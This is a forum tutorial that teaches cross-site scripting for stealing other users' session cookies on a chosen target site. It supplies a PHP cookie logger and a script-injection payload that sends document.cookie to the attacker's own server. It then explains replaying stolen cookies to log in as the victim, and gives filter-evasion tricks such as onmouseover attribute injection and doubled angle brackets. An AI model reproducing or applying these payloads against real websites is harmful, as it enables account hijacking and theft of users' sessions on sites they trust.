|
I don't come around here very often, but I like the way this community is looking, so i may come back more often and write some more in-depth articles. Direct any questions you have about this article to RyanTheGreatt on aim. I take no responsibility for what you do with this information, this article is for information purposes only.
1. Introduction I noticed there was a link to another XSS article on this forum, however, i didn't like the way it was produced since i saw very few specific examples and it wasn't very 'noob' friendly.
XSS means cross site scripting, it's a very popular, and useful form of hacking. It's popularity comes from it's easy use and endless possibilities in use.
2. PHP log
Let's start with a basic XSS example and explain how it works. For the purpose of this article, it assumed you have access to a web server running PHP, and a basic understanding of PHP and JavaScript.
First, lets create a simple PHP script named log.php which will log stolen cookies for us <?php
$cookie = $_GET['cookie'];
$file = fopen("cookies.txt", "a");
if (fwrite($file, "$cookie \n") === FALSE){echo "Error";}else{echo "";}
fclose($file)
?> Okay, what this code will do is:Grab the supplied cookie information from the URL bar. Open a file on the web server used for logging cookies. Write the information to the file, and then close the file.
(You must have a file names cookies .txt on your web server. In my example cookies.txt is chmodded to 777.)
Okay, now you may be saying "Well, I’ve got it set up, but how do I get people's cookies?"
What you need to do, is find a target site...Don't pick a site like yahoo.com because you'll never get it to work. Pick a user-system based site which we will try to exploit.
3. Testing a site for vulnerabilities
Now that you've found your target site, look around the site for places where users can submit data.
Once you have an input field described above, try to inject a simple JavaScript like this. <script>alert('Testing')</script> If this is successful, a message box will appear on the page the information is submitted to with the text Testing. This means the site is vulnerable to XSS. Although most sites will not allow the script tags, this is a basic form of testing. More advanced ways will be listed in section 6. Sneaky vulnerabilities.
4. Stealing the cookies.
Okay, now we will be putting all the loose ends together. On the site which you injected the JavaScript alert, we will be injecting some code to make the browser redirect to your cookie log page. The basis is to have OTHER users view the page which your JavaScript redirection is located on, then be redirected to your site, and have their cookies logged.
The code you will need to inject is: <script>window.location = "http://yourwebserver.com/log.php?cookie="+document.cookie</script> This will redirect the user to http://yourwebserver.com/log.php and supply the user’s cookie information to your logging script.
Now, once you’ve redirected a user, all you need to do is visit http://yourwebserver.com/cookies.txt to view the stolen cookie.
5. Using the stolen cookies on the website
Now, return to the website you’ve stolen your cookies from. To change your cookie information to the information of another user, all you have to do is write this into the URL bar and hit enter:
Javascript:void(document.cookie="variablename=theirinformation") For this to work, you need to replace variablename with the cookie value’s name such as password, and theirinformation with the information supplied in the stolen cookie.
A sample input would be Javascript:void(document.cookie="password=admin")
This changes your current password to the password of the user who's cookie you stole. Once you have voided ALL information, refresh the page and you will be logged in as that user.
6.Sneaky Vulnerabilities
Now since most sites of any interest will void <script> tags, sometimes we need to get more creative.
An interesting technique i use personally which is surprisinlgy successful in most scripts, is an onmouseover code. Now let's find a field which will be turned into a link at one point or another (a link to your personal webpage or something).
First, go to the page where the link is posted, such as your user profile.
Next, view the source and find the link in the source it will look like: <a xhref="http://thelink.com">Link</a> or <a xhref='http://thelink.com'>Link</a> The difference between the " and the ' must be noted.
Now we're ready for the injection. Go to the form which submits the link and type:
http://thelink.com" onmouseover="alert('Testing');
Please not that this example refers to the a xhref= using " if the a xhref= used ' replace it in the example where appropriate.
Now, go to the page and scroll your mouse over the link, do you get an alert?
If so, the page can be injected how I explained earlier.
Okay, now for a slightly less popular method.
If you try to inject <script>alert(document.cookie)</script> and it echos scriptalert(document.cookie)/scriptTry inputting: <<script>>alert(document.cookie)<</script>> This may be successful in some cases.
7. Conclusion
That's all for now, i will be back to write more articles.
Related Items:
|
